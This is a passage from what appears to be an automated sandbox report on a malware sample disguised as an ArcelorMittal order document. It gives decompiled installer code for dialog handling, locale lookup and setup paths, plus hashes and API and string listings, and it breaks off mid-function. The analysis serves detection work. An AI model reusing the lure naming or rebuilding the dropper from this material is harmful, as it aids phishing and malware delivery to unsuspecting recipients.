Instruction Fuzzy Hash: 81016DB16052848FDB34DE68CD587DE77E5EFD5300F85812AEC8AAB248D3306945CB16

Uniqueness

Uniqueness Score: -1.00%

Function 02FA58AD Relevance: .2, Instructions: 250COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 591fb5e8122db522a0c4837312270c3a29b8431142da6affe9596e5469ecf6ff
Instruction ID: a813f3f862f430fb28c65b9572cadf47ecf18c014cf517a946435f5f38c93cd9
Opcode Fuzzy Hash: 591fb5e8122db522a0c4837312270c3a29b8431142da6affe9596e5469ecf6ff
Instruction Fuzzy Hash: DA9144B2B0434A9FDB30AE28CDA47DF73F2AF95390F55852DDD899B204D73089858B52

Uniqueness

Uniqueness Score: -1.00%

Function 02FAD80A Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88f40a3354036860d5535e9a66d5f8644600682aa1173c3c1245419e6f1eca7d
Instruction ID: 1193a162dc929a38eae22fa1b39059ae2c59213fa0e05391378bfd06fecddb18
Opcode Fuzzy Hash: 88f40a3354036860d5535e9a66d5f8644600682aa1173c3c1245419e6f1eca7d
Instruction Fuzzy Hash: 6F51E3B2B0434A9BDF30AE28CDA47DE73A6AF957D0F15842EDD49DB200C7308A468B51

Uniqueness

Uniqueness Score: -1.00%

Function 00403C1E Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 84%

			E00403C1E(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t37;
				signed int _t39;
				signed int _t41;
				struct HWND__* _t51;
				signed int _t69;
				struct HWND__* _t75;
				signed int _t88;
				struct HWND__* _t93;
				signed int _t101;
				int _t105;
				signed int _t117;
				signed int _t118;
				int _t119;
				signed int _t124;
				struct HWND__* _t127;
				struct HWND__* _t128;
				int _t129;
				long _t132;
				int _t134;
				int _t135;
				void* _t136;
				void* _t144;

				_t117 = _a8;
				if(_t117 == 0x110 || _t117 == 0x408) {
					_t37 = _a12;
					_t127 = _a4;
					__eflags = _t117 - 0x110;
					 *0x7a1f28 = _t37;
					if(_t117 == 0x110) {
						 *0x7a8a48 = _t127;
						 *0x7a1f3c = GetDlgItem(_t127, 1);
						_t93 = GetDlgItem(_t127, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x79ff08 = _t93;
						E004040F6(_t127);
						SetClassLongW(_t127, 0xfffffff2,  *0x7a7a28);
						 *0x7a7a0c = E0040140B(4);
						_t37 = 1;
						__eflags = 1;
						 *0x7a1f28 = 1;
					}
					_t124 =  *0x40a388; // 0x0
					_t135 = 0;
					_t132 = (_t124 << 6) +  *0x7a8a60;
					__eflags = _t124;
					if(_t124 < 0) {
						L34:
						E00404142(0x40b);
						while(1) {
							_t39 =  *0x7a1f28;
							 *0x40a388 =  *0x40a388 + _t39;
							_t132 = _t132 + (_t39 << 6);
							_t41 =  *0x40a388; // 0x0
							__eflags = _t41 -  *0x7a8a64;
							if(_t41 ==  *0x7a8a64) {
								E0040140B(1);
							}
							__eflags =  *0x7a7a0c - _t135; // 0x0
							if(__eflags != 0) {
								break;
							}
							__eflags =  *0x40a388 -  *0x7a8a64; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t118 =  *(_t132 + 0x14);
							E00406054(_t118, _t127, _t132, 0x7b8000,  *((intOrPtr*)(_t132 + 0x24)));
							_push( *((intOrPtr*)(_t132 + 0x20)));
							_push(0xfffffc19);
							E004040F6(_t127);
							_push( *((intOrPtr*)(_t132 + 0x1c)));
							_push(0xfffffc1b);
							E004040F6(_t127);
							_push( *((intOrPtr*)(_t132 + 0x28)));
							_push(0xfffffc1a);
							E004040F6(_t127);
							_t51 = GetDlgItem(_t127, 3);
							__eflags =  *0x7a8acc - _t135;
							_v32 = _t51;
							if( *0x7a8acc != _t135) {
								_t118 = _t118 & 0x0000fefd | 0x00000004;
								__eflags = _t118;
							}
							ShowWindow(_t51, _t118 & 0x00000008); // executed
							EnableWindow( *(_t136 + 0x30), _t118 & 0x00000100); // executed
							E00404118(_t118 & 0x00000002);
							_t119 = _t118 & 0x00000004;
							EnableWindow( *0x79ff08, _t119);
							__eflags = _t119 - _t135;
							if(_t119 == _t135) {
								_push(1);
							} else {
								_push(_t135);
							}
							EnableMenuItem(GetSystemMenu(_t127, _t135), 0xf060, ??);
							SendMessageW( *(_t136 + 0x38), 0xf4, _t135, 1);
							__eflags =  *0x7a8acc - _t135;
							if( *0x7a8acc == _t135) {
								_push( *0x7a1f3c);
							} else {
								SendMessageW(_t127, 0x401, 2, _t135);
								_push( *0x79ff08);
							}
							E0040412B();
							E00406032(0x7a1f40, "Overcaustically Setup");
							E00406054(0x7a1f40, _t127, _t132,  &(0x7a1f40[lstrlenW(0x7a1f40)]),  *((intOrPtr*)(_t132 + 0x18)));
							SetWindowTextW(_t127, 0x7a1f40); // executed
							_push(_t135);
							_t69 = E00401389( *((intOrPtr*)(_t132 + 8)));
							__eflags = _t69;
							if(_t69 != 0) {
								continue;
							} else {
								__eflags =  *_t132 - _t135;
								if( *_t132 == _t135) {
									continue;
								}
								__eflags =  *(_t132 + 4) - 5;
								if( *(_t132 + 4) != 5) {
									DestroyWindow( *0x7a7a18); // executed
									 *0x7a0f18 = _t132;
									__eflags =  *_t132 - _t135;
									if( *_t132 <= _t135) {
										goto L58;
									}
									_t75 = CreateDialogParamW( *0x7a8a40,  *_t132 +  *0x7a7a20 & 0x0000ffff, _t127,  *(0x40a38c +  *(_t132 + 4) * 4), _t132); // executed
									__eflags = _t75 - _t135;
									 *0x7a7a18 = _t75;
									if(_t75 == _t135) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t132 + 0x2c)));
									_push(6);
									E004040F6(_t75);
									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t136 + 0x10);
									ScreenToClient(_t127, _t136 + 0x10);
									SetWindowPos( *0x7a7a18, _t135,  *(_t136 + 0x20),  *(_t136 + 0x20), _t135, _t135, 0x15);
									_push(_t135);
									E00401389( *((intOrPtr*)(_t132 + 0xc)));
									__eflags =  *0x7a7a0c - _t135; // 0x0
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x7a7a18, 8); // executed
									E00404142(0x405);
									goto L58;
								}
								__eflags =  *0x7a8acc - _t135;
								if( *0x7a8acc != _t135) {
									goto L61;
								}
								__eflags =  *0x7a8ac0 - _t135;
								if( *0x7a8ac0 != _t135) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x7a7a18);
						 *0x7a8a48 = _t135;
						EndDialog(_t127,  *0x7a0710);
						goto L58;
					} else {
						__eflags = _t37 - 1;
						if(_t37 != 1) {
							L33:
							__eflags =  *_t132 - _t135;
							if( *_t132 == _t135) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t88 = E00401389( *((intOrPtr*)(_t132 + 0x10)));
						__eflags = _t88;
						if(_t88 == 0) {
							goto L33;
						}
						SendMessageW( *0x7a7a18, 0x40f, 0, 1);
						__eflags =  *0x7a7a0c - _t135; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t127 = _a4;
					_t135 = 0;
					if(_t117 == 0x47) {
						SetWindowPos( *0x7a1f20, _t127, 0, 0, 0, 0, 0x13);
					}
					if(_t117 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x7a1f20,  ~(_a12 - 1) & _t117);
					}
					if(_t117 != 0x40d) {
						__eflags = _t117 - 0x11;
						if(_t117 != 0x11) {
							__eflags = _t117 - 0x111;
							if(_t117 != 0x111) {
								L26:
								return E0040415D(_t117, _a12, _a16);
							}
							_t134 = _a12 & 0x0000ffff;
							_t128 = GetDlgItem(_t127, _t134);
							__eflags = _t128 - _t135;
							if(_t128 == _t135) {
								L13:
								__eflags = _t134 - 1;
								if(_t134 != 1) {
									__eflags = _t134 - 3;
									if(_t134 != 3) {
										_t129 = 2;
										__eflags = _t134 - _t129;
										if(_t134 != _t129) {
											L25:
											SendMessageW( *0x7a7a18, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x7a8acc - _t135;
										if( *0x7a8acc == _t135) {
											_t101 = E0040140B(3);
											__eflags = _t101;
											if(_t101 != 0) {
												goto L26;
											}
											 *0x7a0710 = 1;
											L21:
											_push(0x78);
											L22:
											E004040CF();
											goto L26;
										}
										E0040140B(_t129);
										 *0x7a0710 = _t129;
										goto L21;
									}
									__eflags =  *0x40a388 - _t135; // 0x0
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t134);
								goto L22;
							}
							SendMessageW(_t128, 0xf3, _t135, _t135);
							_t105 = IsWindowEnabled(_t128);
							__eflags = _t105;
							if(_t105 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongW(_t127, _t135, _t135);
						return 1;
					} else {
						DestroyWindow( *0x7a7a18);
						 *0x7a7a18 = _a12;
						L58:
						if( *0x7a3f40 == _t135) {
							_t144 =  *0x7a7a18 - _t135; // 0x1043c
							if(_t144 != 0) {
								ShowWindow(_t127, 0xa); // executed
								 *0x7a3f40 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}

0x00403c27
0x00403c30
0x00403d71
0x00403d75
0x00403d79
0x00403d7b
0x00403d80
0x00403d8b
0x00403d96
0x00403d9b
0x00403d9d
0x00403d9f
0x00403da2
0x00403da7
0x00403db5
0x00403dc2
0x00403dc9
0x00403dc9
0x00403dca
0x00403dca
0x00403dcf
0x00403dd5
0x00403ddc
0x00403de2
0x00403de4
0x00403e24
0x00403e29
0x00403e2e
0x00403e2e
0x00403e33
0x00403e3c
0x00403e3e
0x00403e43
0x00403e49
0x00403e4d
0x00403e4d
0x00403e52
0x00403e58
0x00000000
0x00000000
0x00403e63
0x00403e69
0x00000000
0x00000000
0x00403e72
0x00403e7a
0x00403e7f
0x00403e82
0x00403e88
0x00403e8d
0x00403e90
0x00403e96
0x00403e9b
0x00403e9e
0x00403ea4
0x00403eac
0x00403eb2
0x00403eb8
0x00403ebc
0x00403ec3
0x00403ec3
0x00403ec3
0x00403ecd
0x00403edf
0x00403eeb
0x00403ef0
0x00403efa
0x00403f00
0x00403f02
0x00403f07
0x00403f04
0x00403f04
0x00403f04
0x00403f17
0x00403f2f
0x00403f31
0x00403f37
0x00403f4c
0x00403f39
0x00403f42
0x00403f44
0x00403f44
0x00403f52
0x00403f62
0x00403f78
0x00403f7f
0x00403f85
0x00403f89
0x00403f8e
0x00403f90
0x00000000
0x00403f96
0x00403f96
0x00403f98
0x00000000
0x00000000
0x00403f9e
0x00403fa2
0x00403fc7
0x00403fcd
0x00403fd3
0x00403fd5
0x00000000
0x00000000
0x00403ffb
0x00404001
0x00404003
0x00404008
0x00000000
0x00000000
0x0040400e
0x00404011
0x00404014
0x0040402b
0x00404037
0x00404050
0x00404056
0x0040405a
0x0040405f
0x00404065
0x00000000
0x00000000
0x0040406f
0x0040407a
0x00000000
0x0040407a
0x00403fa4
0x00403faa
0x00000000
0x00000000
0x00403fb0
0x00403fb6
0x00000000
0x00000000
0x00000000
0x00403fbc
0x00403f90
0x00404087
0x00404093
0x0040409a
0x00000000
0x00403de6
0x00403de6
0x00403de9
0x00403e1c
0x00403e1c
0x00403e1e
0x00000000
0x00000000
0x00000000
0x00403e1e
0x00403deb
0x00403def
0x00403df4
0x00403df6
0x00000000
0x00000000
0x00403e06
0x00403e0e
0x00000000
0x00403e14
0x00403c42
0x00403c42
0x00403c46
0x00403c4b
0x00403c5a
0x00403c5a
0x00403c63
0x00403c6c
0x00403c77
0x00403c77
0x00403c83
0x00403c9f
0x00403ca2
0x00403cb5
0x00403cbb
0x00403d5e
0x00000000
0x00403d67
0x00403cc1
0x00403cce
0x00403cd0
0x00403cd2
0x00403cf1
0x00403cf1
0x00403cf4
0x00403cf9
0x00403cfc
0x00403d0c
0x00403d0d
0x00403d0f
0x00403d45
0x00403d58
0x00000000
0x00403d58
0x00403d11
0x00403d17
0x00403d30
0x00403d35
0x00403d37
0x00000000
0x00000000
0x00403d39
0x00403d25
0x00403d25
0x00403d27
0x00403d27
0x00000000
0x00403d27
0x00403d1a
0x00403d1f
0x00000000
0x00403d1f
0x00403cfe
0x00403d04
0x00000000
0x00000000
0x00403d06
0x00000000
0x00403d06
0x00403cf6
0x00000000
0x00403cf6
0x00403cdc
0x00403ce3
0x00403ce9
0x00403ceb
0x00000000
0x00000000
0x00000000
0x00403ceb
0x00403ca7
0x00000000
0x00403c85
0x00403c8b
0x00403c95
0x004040a0
0x004040a6
0x004040a8
0x004040ae
0x004040b3
0x004040b9
0x004040b9
0x004040ae
0x004040c3
0x00000000
0x004040c3
0x00403c83

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403C5A
ShowWindow.USER32(?), ref: 00403C77
DestroyWindow.USER32 ref: 00403C8B
SetWindowLongW.USER32(?,00000000,00000000), ref: 00403CA7
GetDlgItem.USER32(?,?), ref: 00403CC8
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403CDC
IsWindowEnabled.USER32(00000000), ref: 00403CE3
GetDlgItem.USER32(?,00000001), ref: 00403D91
GetDlgItem.USER32(?,00000002), ref: 00403D9B
SetClassLongW.USER32(?,000000F2,?), ref: 00403DB5
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403E06
GetDlgItem.USER32(?,00000003), ref: 00403EAC
ShowWindow.USER32(00000000,?), ref: 00403ECD
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403EDF
EnableWindow.USER32(?,?), ref: 00403EFA
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F10
EnableMenuItem.USER32(00000000), ref: 00403F17
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403F2F
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403F42
lstrlenW.KERNEL32(007A1F40,?,007A1F40,Overcaustically Setup), ref: 00403F6B
SetWindowTextW.USER32(?,007A1F40), ref: 00403F7F
ShowWindow.USER32(?,0000000A), ref: 004040B3

Strings

Overcaustically Setup, xrefs: 00403F5C

Memory Dump Source

Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: Overcaustically Setup
API String ID: 3282139019-1715260814
Opcode ID: 426f01107b3485b81cd68b564b608a380621adfe565edd953016c1e22f2525a4
Instruction ID: cca83e8e3ea8fbb2d4c878b4d098dd65b90ea533b8cc41e08898a63a3c4fefdb
Opcode Fuzzy Hash: 426f01107b3485b81cd68b564b608a380621adfe565edd953016c1e22f2525a4
Instruction Fuzzy Hash: FFC1BE71504204AFDB20AF61ED84E2B7BA8EB86745F00893EF641B11F0CB3D9952DB5E

Uniqueness

Uniqueness Score: -1.00%

Function 0040387B Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E0040387B(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t22;
				void* _t30;
				void* _t32;
				int _t33;
				void* _t36;
				int _t39;
				int _t40;
				intOrPtr _t41;
				int _t44;
				short _t63;
				WCHAR* _t65;
				signed char _t69;
				WCHAR* _t76;
				intOrPtr _t82;
				WCHAR* _t87;

				_t82 =  *0x7a8a50;
				_t22 = E00406408(2);
				_t90 = _t22;
				if(_t22 == 0) {
					_t76 = 0x7a1f40;
					L"1033" = 0x30;
					 *0x7b5002 = 0x78;
					 *0x7b5004 = 0;
					E00405EFF(0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x7a1f40, 0);
					__eflags =  *0x7a1f40;
					if(__eflags == 0) {
						E00405EFF(0x80000003, L".DEFAULT\\Control Panel\\International",  &M0040838C, 0x7a1f40, 0);
					}
					lstrcatW(L"1033", _t76);
				} else {
					E00405F79(L"1033",  *_t22() & 0x0000ffff);
				}
				E00403B51(_t78, _t90);
				_t86 = L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Jansis";
				 *0x7a8ac0 =  *0x7a8a58 & 0x00000020;
				 *0x7a8adc = 0x10000;
				if(E00405AEE(_t90, L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\Jansis") != 0) {
					L16:
					if(E00405AEE(_t98, _t86) == 0) {
						E00406054(_t76, 0, _t82, _t86,  *((intOrPtr*)(_t82 + 0x118))); // executed
					}
					_t30 = LoadImageW( *0x7a8a40, 0x67, 1, 0, 0, 0x8040); // executed
					 *0x7a7a28 = _t30;
					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t32 = E00403B51(_t78, __eflags);
							__eflags =  *0x7a8ae0;
							if( *0x7a8ae0 != 0) {
								_t33 = E00405264(_t32, 0);
								__eflags = _t33;
								if(_t33 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x7a7a0c; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x7a1f20, 5); // executed
							_t39 = E0040639C("RichEd20"); // executed
							__eflags = _t39;
							if(_t39 == 0) {
								E0040639C("RichEd32");
							}
							_t87 = L"RichEdit20W";
							_t40 = GetClassInfoW(0, _t87, 0x7a79e0);
							__eflags = _t40;
							if(_t40 == 0) {
								GetClassInfoW(0, L"RichEdit", 0x7a79e0);
								 *0x7a7a04 = _t87;
								RegisterClassW(0x7a79e0);
							}
							_t41 =  *0x7a7a20; // 0x0
							_t44 = DialogBoxParamW( *0x7a8a40, _t41 + 0x00000069 & 0x0000ffff, 0, E00403C1E, 0); // executed
							E004037CB(E0040140B(5), 1);
							return _t44;
						}
						L22:
						_t36 = 2;
						return _t36;
					} else {
						_t78 =  *0x7a8a40;
						 *0x7a79e4 = E00401000;
						 *0x7a79f0 =  *0x7a8a40;
						 *0x7a79f4 = _t30;
						 *0x7a7a04 = 0x40a3a0;
						if(RegisterClassW(0x7a79e0) == 0) {
							L33:
							__eflags = 0;
							return 0;
						}
						SystemParametersInfoW(0x30, 0,  &_v16, 0);
						 *0x7a1f20 = CreateWindowExW(0x80, 0x40a3a0, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x7a8a40, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					if( *(_t82 + 0x48) == 0) {
						goto L16;
					}
					_t76 = 0x7a69e0;
					E00405EFF( *((intOrPtr*)(_t82 + 0x44)),  *0x7a8a78 + _t78 * 2,  *0x7a8a78 +  *(_t82 + 0x4c) * 2, 0x7a69e0, 0);
					_t63 =  *0x7a69e0; // 0x43
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x7a69e2;
						 *((short*)(E00405A13(0x7a69e2, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E00406032(_t86, E004059E6(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405A32(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x00403881
0x0040388a
0x00403891
0x00403893
0x004038a7
0x004038b9
0x004038c2
0x004038cb
0x004038d2
0x004038d7
0x004038de
0x004038f1
0x004038f1
0x004038fc
0x00403895
0x004038a0
0x004038a0
0x00403901
0x0040390b
0x00403914
0x00403919
0x0040392a
0x004039bc
0x004039c4
0x004039cd
0x004039cd
0x004039e3
0x004039e9
0x004039f7
0x00403a78
0x00403a80
0x00403a8a
0x00403a8f
0x00403a95
0x00403b1f
0x00403b24
0x00403b26
0x00403b42
0x00000000
0x00403b42
0x00403b28
0x00403b2e
0x00403b36
0x00403b36
0x00000000
0x00403b2e
0x00403aa3
0x00403aae
0x00403ab3
0x00403ab5
0x00403abc
0x00403abc
0x00403ac7
0x00403acf
0x00403ad1
0x00403ad3
0x00403adc
0x00403adf
0x00403ae5
0x00403ae5
0x00403aeb
0x00403b04
0x00403b15
0x00000000
0x00403b1a
0x00403a82
0x00403a84
0x00000000
0x004039f9
0x004039f9
0x00403a05
0x00403a0f
0x00403a15
0x00403a1a
0x00403a29
0x00403b47
0x00403b47
0x00000000
0x00403b47
0x00403a38
0x00403a73
0x00000000
0x00403a73
0x00403930
0x00403930
0x00403935
0x00000000
0x00000000
0x00403943
0x00403955
0x0040395a
0x00403963
0x00000000
0x00000000
0x00403969
0x0040396b
0x00403978
0x00403978
0x00403981
0x00403987
0x004039af
0x004039b7
0x00000000
0x00403999
0x0040399a
0x004039a3
0x004039a9
0x004039aa
0x00000000
0x004039aa
0x004039a5
0x004039a7
0x00000000
0x00000000
0x00000000
0x004039a7
0x00403987

APIs

Part of subcall function 00406408: GetModuleHandleA.KERNEL32(?,?,00000020,004032E9,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040641A
Part of subcall function 00406408: GetProcAddress.KERNEL32(00000000,?), ref: 00406435

lstrcatW.KERNEL32(1033,007A1F40), ref: 004038FC
lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Jansis,1033,007A1F40,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F40,00000000,00000002,762E3420), ref: 0040397C
lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Jansis,1033,007A1F40,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F40,00000000), ref: 0040398F
GetFileAttributesW.KERNEL32(Call), ref: 0040399A
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Jansis), ref: 004039E3

Part of subcall function 00405F79: wsprintfW.USER32 ref: 00405F86

RegisterClassW.USER32(007A79E0), ref: 00403A20
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A38
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403A6D
ShowWindow.USER32(00000005,00000000), ref: 00403AA3
GetClassInfoW.USER32(00000000,RichEdit20W,007A79E0), ref: 00403ACF
GetClassInfoW.USER32(00000000,RichEdit,007A79E0), ref: 00403ADC
RegisterClassW.USER32(007A79E0), ref: 00403AE5
DialogBoxParamW.USER32(?,00000000,00403C1E,00000000), ref: 00403B04

Strings

RichEd32, xrefs: 00403AB7
.exe, xrefs: 00403989
RichEdit20W, xrefs: 00403AC7, 00403ACD
C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Jansis, xrefs: 0040390B, 00403913, 004039B6, 004039BC, 004039CC
_Nb, xrefs: 004039FF, 00403A67
Control Panel\Desktop\ResourceLocale, xrefs: 004038AF
RichEdit, xrefs: 00403AD6
yz, xrefs: 004039F2
1033, xrefs: 0040389B, 004038F7
RichEd20, xrefs: 00403AA9
.DEFAULT\Control Panel\International, xrefs: 004038E7
"C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe", xrefs: 0040387E
Call, xrefs: 00403943, 0040394C, 0040395A, 004039A9, 004039AF
C:\Users\user\AppData\Local\Temp\, xrefs: 00403880

Memory Dump Source

Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Jansis$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$yz
API String ID: 1975747703-4104693600
Opcode ID: d6a2569dce1583fa4271488535ea6afbb2ec52d86251b0d01a743b5b25147845
Instruction ID: b5c0bd5baa1962433b8b11afb21299241a1e412529c89f65b595a7484f15debb
Opcode Fuzzy Hash: d6a2569dce1583fa4271488535ea6afbb2ec52d86251b0d01a743b5b25147845
Instruction Fuzzy Hash: E761A570240600AED620BF669D46F2B3A6CEBC5B45F40857FF941B22E2DB7C9901CB6D

Uniqueness

Uniqueness Score: -1.00%

Function 00402DEE Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E00402DEE(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				signed int _t50;
				void* _t53;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				signed int _t65;
				signed int _t70;
				signed int _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				signed int _t85;
				signed int _t87;
				void* _t89;
				signed int _t90;
				signed int _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = L"C:\\Users\\Arthur\\Desktop\\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe";
				 *0x7a8a4c = _t43 + 0x3e8;
